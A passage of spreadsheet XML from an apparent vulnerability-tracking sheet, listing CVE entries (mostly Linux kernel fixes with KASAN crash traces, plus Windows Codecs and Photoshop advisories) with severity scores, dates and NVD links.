      <c r="G331" s="5" t="inlineStr"/>
      <c r="H331" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I331" s="5" t="inlineStr"/>
      <c r="J331" s="5" t="inlineStr"/>
      <c r="K331" s="5" t="inlineStr"/>
      <c r="L331" s="5" t="inlineStr"/>
      <c r="M331" s="5" t="inlineStr"/>
      <c r="N331" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O331" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P331" s="5" t="inlineStr"/>
      <c r="Q331" s="5" t="inlineStr"/>
      <c r="R331" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: ravb: avoid dereferencing an invalid PTP clock
The PTP clock is unavailable before the first open, so querying its
index can dereference a NULL pointer. Registration failures can also
leave an error pointer in priv-&gt;ptp.clock.
Cache the PHC index separately and report -1 while no clock is
registered. Normalize registration errors to NULL and preserve the
static timestamping capabilities.</t>
        </is>
      </c>
      <c r="S331" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80992</t>
        </is>
      </c>
    </row>
    <row r="332">
      <c r="A332" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B332" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C332" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80994</t>
        </is>
      </c>
      <c r="D332" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E332" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F332" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G332" s="5" t="inlineStr"/>
      <c r="H332" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I332" s="5" t="inlineStr"/>
      <c r="J332" s="5" t="inlineStr"/>
      <c r="K332" s="5" t="inlineStr"/>
      <c r="L332" s="5" t="inlineStr"/>
      <c r="M332" s="5" t="inlineStr"/>
      <c r="N332" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O332" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P332" s="5" t="inlineStr"/>
      <c r="Q332" s="5" t="inlineStr"/>
      <c r="R332" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: openvswitch: fix flow mask use-after-free on flow deletion
The commit in the Fixes tag below made so flow-&gt;mask free is scheduled
via RCU right after it is removed from the flow table.  The pointer
stays in the flow structure and it can be accessible while in the same
RCU critical section.  This is done to avoid requiring ovs_mutex for
the ovs_flow_free().
However, while removing the flow during processing of CMD_DEL, we do
not take RCU read lock before the removal, and ovs_flow_cmd_fill_info()
uses the flow-&gt;mask pointer afterwards.  The RCU read lock is taken,
but it's already late at that point.  The comment on that line
acknowledges that the lock is cosmetic and doesn't serve a real purpose.
This leads to use-after-free if the RCU grace period passes between
removal and the filling.  It is a short race window, but it is there
and can lead to a real crash in case memory allocation for the info
takes a bit longer:
 BUG: KASAN: slab-use-after-free in __ovs_nla_put_key
             net/openvswitch/flow_netlink.c:1996
 BUG: KASAN: slab-use-after-free in ovs_nla_put_key+0x2463/0x2e30
             net/openvswitch/flow_netlink.c:2250
 Read of size 4 at addr ffff88801ee89970 by task ovs_flow_del_ec/9487
 Call Trace:
  &lt;TASK&gt;
  __ovs_nla_put_key net/openvswitch/flow_netlink.c:1996
  ovs_nla_put_key+0x2463/0x2e30 net/openvswitch/flow_netlink.c:2250
  ovs_flow_cmd_fill_info+0x420/0x9c0 net/openvswitch/datapath.c:930
  ovs_flow_cmd_del+0x53a/0x970 net/openvswitch/datapath.c:1467
  ...
  netlink_rcv_skb+0x156/0x420 net/netlink/af_netlink.c:2556
  &lt;/TASK&gt;
 Allocated by task 9487:
  mask_alloc net/openvswitch/flow_table.c:967
  flow_mask_insert net/openvswitch/flow_table.c:1012
  ovs_flow_tbl_insert+0xea2/0x1a90 net/openvswitch/flow_table.c:1084
  ovs_flow_cmd_new+0x7e3/0xd90 net/openvswitch/datapath.c:1086
  ...
  netlink_rcv_skb+0x156/0x420 net/netlink/af_netlink.c:2556
 Freed by task 9485:
  rcu_free_sheaf+0x1e/0x100 mm/slub.c:5978
  rcu_do_batch kernel/rcu/tree.c:2645
  rcu_core+0x59c/0x10c0 kernel/rcu/tree.c:2897
  handle_softirqs+0x1e4/0x9a0 kernel/softirq.c:622
  ...
  instr_sysvec_apic_timer_interrupt arch/x86/kernel/apic/apic.c:1062
ovs_flow_tbl_remove() must be called after the ovs_flow_cmd_fill_info()
to avoid this race.  This also helps with cleaning up the forced cast
and the cosmetic RCU read lock.  Before the commit in the Fixes tag the
order did not matter as long as the flow object itself was not freed.
A wider RCU critical section could be another option, but we have a
GFP_KERNEL allocation in the way.
Reported by Trend Micro's Zero Day Initiative as ZDI-CAN-32042.</t>
        </is>
      </c>
      <c r="S332" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80994</t>
        </is>
      </c>
    </row>
    <row r="333">
      <c r="A333" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B333" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C333" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80995</t>
        </is>
      </c>
      <c r="D333" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E333" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F333" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G333" s="5" t="inlineStr"/>
      <c r="H333" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I333" s="5" t="inlineStr"/>
      <c r="J333" s="5" t="inlineStr"/>
      <c r="K333" s="5" t="inlineStr"/>
      <c r="L333" s="5" t="inlineStr"/>
      <c r="M333" s="5" t="inlineStr"/>
      <c r="N333" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O333" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P333" s="5" t="inlineStr"/>
      <c r="Q333" s="5" t="inlineStr"/>
      <c r="R333" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: mctp: hold a reference to the route device in mctp_route_lookup()
mctp_route_lookup() uses rt-&gt;dev without holding a reference on it.
mctp_route_lookup_single() returns the route under RCU only, so the
route's device can be torn down concurrently: mctp_dev_put() drops the
last reference and synchronously kfree()s mdev-&gt;addrs.  mctp_dev_saddr()
then reads rt-&gt;dev-&gt;addrs[0], giving a use-after-free reachable by an
unprivileged local AF_MCTP user on the receive/forwarding path (no
CAP_NET_RAW required):
  BUG: KASAN: slab-use-after-free in mctp_route_lookup
  Read of size 1 at addr ... by task mctp_uaf/...
   mctp_route_lookup
   mctp_pkttype_receive
  Freed by task ...:
   kfree
   mctp_dev_put
   mctp_dev_notify
In the same window mctp_dst_from_route() -&gt; mctp_dev_hold() also
increments a refcount that has already reached zero
("refcount_t: addition on 0 ... mctp_dev_hold").
This reintroduces the use-after-free class of CVE-2023-3439: the source
address lookup was moved ahead of the point where the destination takes
its device reference.
Take a reference with refcount_inc_not_zero() before touching rt-&gt;dev,
skip a device that is already dead, and drop the reference once the
destination has taken its own.</t>
        </is>
      </c>
      <c r="S333" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80995</t>
        </is>
      </c>
    </row>
    <row r="334">
      <c r="A334" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B334" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C334" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81000</t>
        </is>
      </c>
      <c r="D334" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E334" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F334" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G334" s="5" t="inlineStr"/>
      <c r="H334" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I334" s="5" t="inlineStr"/>
      <c r="J334" s="5" t="inlineStr"/>
      <c r="K334" s="5" t="inlineStr"/>
      <c r="L334" s="5" t="inlineStr"/>
      <c r="M334" s="5" t="inlineStr"/>
      <c r="N334" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O334" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P334" s="5" t="inlineStr"/>
      <c r="Q334" s="5" t="inlineStr"/>
      <c r="R334" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
net: tun: bound receive headroom
tun_get_user() uses tun-&gt;align both as skb headroom and when choosing how
much packet data to keep linear. OVS can propagate an oversized headroom
request from another port to TUN or TAP.
When align is larger than the usable space in a one-page skb head,
SKB_MAX_HEAD(align) underflows and the result becomes negative when stored
in good_linear. That value later wraps when assigned to the size_t linear
variable, and tun_alloc_skb() can place skb-&gt;data outside the allocated
head.
Bound the headroom stored by TUN to the one-page skb-head budget and the
largest non-sentinel 16-bit skb header offset. Leave one linear byte for
raw TUN and a complete Ethernet header for TAP, including NET_IP_ALIGN.
Also pull the raw-TUN protocol byte and the TAP Ethernet header before
accessing them, so these checks remain safe for nonlinear skbs supplied by
other allocation paths.</t>
        </is>
      </c>
      <c r="S334" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81000</t>
        </is>
      </c>
    </row>
    <row r="335">
      <c r="A335" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B335" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C335" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81001</t>
        </is>
      </c>
      <c r="D335" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E335" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F335" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G335" s="5" t="inlineStr"/>
      <c r="H335" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I335" s="5" t="inlineStr"/>
      <c r="J335" s="5" t="inlineStr"/>
      <c r="K335" s="5" t="inlineStr"/>
      <c r="L335" s="5" t="inlineStr"/>
      <c r="M335" s="5" t="inlineStr"/>
      <c r="N335" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O335" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P335" s="5" t="inlineStr"/>
      <c r="Q335" s="5" t="inlineStr"/>
      <c r="R335" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
slip: fix use-after-free in sl_sync()
slip_devs[] stores bare net_device pointers and takes no reference on
them.  sl_sync() and sl_alloc() walk that table from slip_open() under
rtnl_lock(), while an entry is dropped by sl_free_netdev(), which
sl_setup() installs as dev-&gt;priv_destructor.
priv_destructor is called from netdev_run_todo(), which deliberately
runs with the RTNL semaphore released so that it can sleep while waiting
for the device refcount to drop:
	/* Snapshot list, allow later requests */
	list_replace_init(&amp;net_todo_list, &amp;list);
	__rtnl_unlock();
	...
		if (dev-&gt;priv_destructor)
			dev-&gt;priv_destructor(dev);	/* slip_devs[i] = NULL */
		if (dev-&gt;needs_free_netdev)
			free_netdev(dev);
		...
		/* Free network device */
		kobject_put(&amp;dev-&gt;dev.kobj);
So rtnl_lock() does not serialise slip_open() against the teardown at
all.  sl_sync() can load slip_devs[i] while the entry is still published
and dereference it after netdev_run_todo() has run the destructor and
released the device:
  CPU0 (slip_open)                 CPU1 (slip_close)
                                   unregister_netdev()
                                     rtnl_unlock()
                                       netdev_run_todo()
                                         __rtnl_unlock()
  rtnl_lock()
  sl_sync()
    dev = slip_devs[i]
                                         priv_destructor(dev)
                                           slip_devs[i] = NULL
                                         kobject_put(&amp;dev-&gt;dev.kobj)
                                           /* dev is freed */
    sl = netdev_priv(dev)
    if (sl-&gt;tty || sl-&gt;leased)     /* use-after-free */
  BUG: KASAN: use-after-free in sl_sync drivers/net/slip/slip.c:730 [inline]
  BUG: KASAN: use-after-free in slip_open+0xef4/0x1210 drivers/net/slip/slip.c:806
  Read of size 1 at addr ffff8880712dac71 by task syz-executor.2/6506
  CPU: 2 PID: 6506 Comm: syz-executor.2 Not tainted 6.1.134-syzkaller-00260-g0c8fc3469765 #0
  Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.12.0-1 04/01/2014
  Call Trace:
   sl_sync drivers/net/slip/slip.c:730 [inline]
   slip_open+0xef4/0x1210 drivers/net/slip/slip.c:806
   tty_ldisc_open+0xa2/0x120 drivers/tty/tty_ldisc.c:433
   tty_set_ldisc+0x324/0x720 drivers/tty/tty_ldisc.c:564
   tiocsetd drivers/tty/tty_io.c:2428 [inline]
   tty_ioctl+0x5f0/0x1530 drivers/tty/tty_io.c:2712
  Allocated by task 6502:
   alloc_netdev_mqs+0x98/0xfe0 net/core/dev.c:10719
   sl_alloc drivers/net/slip/slip.c:756 [inline]
   slip_open+0x36d/0x1210 drivers/net/slip/slip.c:817
   tty_ldisc_open+0xa2/0x120 drivers/tty/tty_ldisc.c:433
   tty_set_ldisc+0x324/0x720 drivers/tty/tty_ldisc.c:564
  Freed by task 6497:
   device_release+0xa2/0x240 drivers/base/core.c:2507
   kobject_put+0x179/0x280 lib/kobject.c:729
   netdev_run_todo+0x6c8/0xef0 net/core/dev.c:10509
   slip_close+0x166/0x1c0 drivers/net/slip/slip.c:906
   tty_ldisc_close+0x113/0x1a0 drivers/tty/tty_ldisc.c:456
   tty_ldisc_kill+0x94/0x160 drivers/tty/tty_ldisc.c:614
   tty_ldisc_release+0xe3/0x2b0 drivers/tty/tty_ldisc.c:782
   tty_release+0xbcc/0xe70 drivers/tty/tty_io.c:1860
Commit e58c19124189 ("slip: Fix use-after-free Read in slip_open") fixed
a different source of stale entries - a device left in slip_devs[] after
slip_open() freed it on the registration error path - and does not
address this race, which is why the report survives it.
Drop the entry from ndo_uninit instead.  unregister_netdevice() calls
ndo_uninit under RTNL, before the device is queued to netdev_run_todo(),
so an entry that sl_sync() can still see while holding RTNL belongs to a
device that cannot be freed until RTNL is dropped.  sl_free_netdev()
stays only for the slip_open() error path, where register_netdevice()
may have failed before ndo_init and ndo_uninit is then not called
either.  Both running for the same device is harmless: the
---truncated---</t>
        </is>
      </c>
      <c r="S335" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81001</t>
        </is>
      </c>
    </row>
    <row r="336">
      <c r="A336" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B336" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C336" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81006</t>
        </is>
      </c>
      <c r="D336" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E336" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F336" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G336" s="5" t="inlineStr"/>
      <c r="H336" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I336" s="5" t="inlineStr"/>
      <c r="J336" s="5" t="inlineStr"/>
      <c r="K336" s="5" t="inlineStr"/>
      <c r="L336" s="5" t="inlineStr"/>
      <c r="M336" s="5" t="inlineStr"/>
      <c r="N336" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O336" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P336" s="5" t="inlineStr"/>
      <c r="Q336" s="5" t="inlineStr"/>
      <c r="R336" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
ipmi: Remove all sysfs files on registration failure
ipmi_add_smi() creates the nr_users and nr_msgs files before trying to
create the maintenance_mode file. If that last creation fails, the error
path removes only nr_users before dropping the final reference to the
interface.
Remove nr_msgs as well so no sysfs attribute embedded in the freed
interface remains registered.</t>
        </is>
      </c>
      <c r="S336" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81006</t>
        </is>
      </c>
    </row>
    <row r="337">
      <c r="A337" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B337" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C337" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81008</t>
        </is>
      </c>
      <c r="D337" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E337" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F337" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G337" s="5" t="inlineStr"/>
      <c r="H337" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I337" s="5" t="inlineStr"/>
      <c r="J337" s="5" t="inlineStr"/>
      <c r="K337" s="5" t="inlineStr"/>
      <c r="L337" s="5" t="inlineStr"/>
      <c r="M337" s="5" t="inlineStr"/>
      <c r="N337" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O337" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P337" s="5" t="inlineStr"/>
      <c r="Q337" s="5" t="inlineStr"/>
      <c r="R337" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
interconnect: Fix use after free in icc_get() and of_icc_get_by_index()
In of_icc_get_by_index() and icc_get(), if the dynamic allocation for
path-&gt;name fails via kasprintf(), the error handling path directly
calls kfree(path) to free the path object and returns an error.
However, prior to this point, path_find() calls path_init(), which
already links the path's requests into the req_list of the respective
interconnect nodes via hlist_add_head(). Directly invoking kfree(path)
leaves dangling pointers in the hlist. A subsequent call to icc_get()
or icc_set_bw() will traverse or modify these corrupted lists, triggering
a slab use afterfree.
KASAN report showing the vulnerability when reproducing via debugfs:
  BUG: KASAN: slab-use-after-free in path_find+0x6f8/0xcfc
  Write of size 8 at addr fff000000d43f748 by task sh/1
  ...
  Call trace:
   kasan_report+0xac/0xfc
   path_find+0x6f8/0xcfc
   icc_get+0x148/0x380
   icc_get_set+0xf8/0x2d0
  ...
  Freed by task 1:
   kfree+0x1a0/0x4a4
   icc_get+0x2cc/0x380
   icc_get_set+0xf8/0x2d0
Fix this by replacing kfree(path) with the proper teardown function,
icc_put(path), which safely removes the requests from the req_list using
hlist_del() and drops the provider usage references before freeing the
memory.
Additionally, in icc_get(), ensure that the icc_lock mutex is released
prior to calling icc_put(path) to avoid a deadlock, as icc_put()
internally acquires the same lock.</t>
        </is>
      </c>
      <c r="S337" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81008</t>
        </is>
      </c>
    </row>
    <row r="338">
      <c r="A338" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B338" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C338" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81010</t>
        </is>
      </c>
      <c r="D338" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E338" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F338" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G338" s="5" t="inlineStr"/>
      <c r="H338" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I338" s="5" t="inlineStr"/>
      <c r="J338" s="5" t="inlineStr"/>
      <c r="K338" s="5" t="inlineStr"/>
      <c r="L338" s="5" t="inlineStr"/>
      <c r="M338" s="5" t="inlineStr"/>
      <c r="N338" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O338" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P338" s="5" t="inlineStr"/>
      <c r="Q338" s="5" t="inlineStr"/>
      <c r="R338" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
io_uring/waitid: honor task_work cancellation
io_waitid_cb() may run through the fallback task_work path when
task_work_add() can no longer queue work to the originating task. The
fallback runs from a kworker and io_uring marks such task work as
canceled through tw.cancel.
io_waitid_cb() currently ignores tw.cancel and calls __do_wait().
waitid is task-context dependent: __do_wait() performs child lookup
relative to current, and the retry path also uses
current-&gt;signal-&gt;wait_chldexit. If the callback runs from the fallback
kworker, current is therefore not the task that submitted the request.
Honor tw.cancel before entering __do_wait(). Complete the request with
-ECANCELED and skip the siginfo copy, since canceled task work may run
without the submitting task's userspace execution context.
Keep the existing siginfo handling for normal waitid completion and
explicit cancellation.</t>
        </is>
      </c>
      <c r="S338" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81010</t>
        </is>
      </c>
    </row>
    <row r="339">
      <c r="A339" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B339" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C339" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81015</t>
        </is>
      </c>
      <c r="D339" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E339" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F339" s="5" t="inlineStr">
        <is>
          <t>416baaa9-dc9f-4396-8d5f-8c081fb06d67</t>
        </is>
      </c>
      <c r="G339" s="5" t="inlineStr"/>
      <c r="H339" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I339" s="5" t="inlineStr"/>
      <c r="J339" s="5" t="inlineStr"/>
      <c r="K339" s="5" t="inlineStr"/>
      <c r="L339" s="5" t="inlineStr"/>
      <c r="M339" s="5" t="inlineStr"/>
      <c r="N339" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O339" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="P339" s="5" t="inlineStr"/>
      <c r="Q339" s="5" t="inlineStr"/>
      <c r="R339" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
platform/x86/amd/pmc: Fix LPS0 and debugfs leaks when STB init fails
amd_pmc_probe() registers the LPS0 s2idle handler with
acpi_register_lps0_dev() and creates the driver's debugfs directory before
calling amd_stb_s2d_init(), which is the last step in probe that can fail.
When amd_stb_s2d_init() fails (for example the S2D telemetry region cannot
be ioremapped on a long-running system, or the SMU rejects the S2D setup)
the error path only calls pci_dev_put() and returns.  This leaves
amd_pmc_s2idle_dev_ops on the global lps0_s2idle_devops_head list and leaks
the debugfs directory, while the devm-managed resources backing the handler
are torn down.
Reloading the module then walks the corrupted list in
acpi_register_lps0_dev() and hits:
  list_add corruption. next-&gt;prev should be prev, but was NULL.
  kernel BUG at lib/list_debug.c:29!
   acpi_register_lps0_dev+0x44/0x80
   amd_pmc_probe+0x224/0x380 [amd_pmc]
   platform_probe+0x67/0x90
Even without a reload, the stale registration means the next s2idle
transition calls into torn-down driver state.
Unwind the debugfs directory and the LPS0 registration on the
amd_stb_s2d_init() error path.  acpi_unregister_lps0_dev() is safe to call
unconditionally here: it is guarded on the same conditions as
acpi_register_lps0_dev(), which is exactly what amd_pmc_remove() already
relies on.</t>
        </is>
      </c>
      <c r="S339" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81015</t>
        </is>
      </c>
    </row>
    <row r="340">
      <c r="A340" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B340" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C340" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81353</t>
        </is>
      </c>
      <c r="D340" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E340" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F340" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G340" s="5" t="inlineStr"/>
      <c r="H340" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I340" s="5" t="inlineStr"/>
      <c r="J340" s="5" t="inlineStr"/>
      <c r="K340" s="5" t="inlineStr"/>
      <c r="L340" s="5" t="inlineStr"/>
      <c r="M340" s="5" t="inlineStr"/>
      <c r="N340" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O340" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P340" s="5" t="inlineStr"/>
      <c r="Q340" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R340" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Microsoft Windows Codecs Library allows an unauthorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="S340" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81353</t>
        </is>
      </c>
    </row>
    <row r="341">
      <c r="A341" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B341" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C341" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82005</t>
        </is>
      </c>
      <c r="D341" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E341" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F341" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G341" s="5" t="inlineStr"/>
      <c r="H341" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I341" s="5" t="inlineStr"/>
      <c r="J341" s="5" t="inlineStr"/>
      <c r="K341" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L341" s="5" t="inlineStr"/>
      <c r="M341" s="5" t="inlineStr"/>
      <c r="N341" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O341" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P341" s="5" t="inlineStr"/>
      <c r="Q341" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="R341" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S341" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82005</t>
        </is>
      </c>
    </row>
    <row r="342">
      <c r="A342" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B342" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C342" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-82006</t>
        </is>
      </c>
      <c r="D342" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E342" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F342" s="5" t="inlineStr">
        <is>
          <t>psirt@adobe.com</t>
        </is>
      </c>
      <c r="G342" s="5" t="inlineStr"/>
      <c r="H342" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I342" s="5" t="inlineStr"/>
      <c r="J342" s="5" t="inlineStr"/>
      <c r="K342" s="5" t="inlineStr">
        <is>
          <t>adobe:photoshop, apple:macos, microsoft:windows</t>
        </is>
      </c>
      <c r="L342" s="5" t="inlineStr"/>
      <c r="M342" s="5" t="inlineStr"/>
      <c r="N342" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O342" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P342" s="5" t="inlineStr"/>
      <c r="Q342" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="R342" s="5" t="inlineStr">
        <is>
          <t>Photoshop Desktop is affected by a Heap-based Buffer Overflow vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t>
        </is>
      </c>
      <c r="S342" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-82006</t>
        </is>
      </c>
    </row>
    <row r="343">
      <c r="A343" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
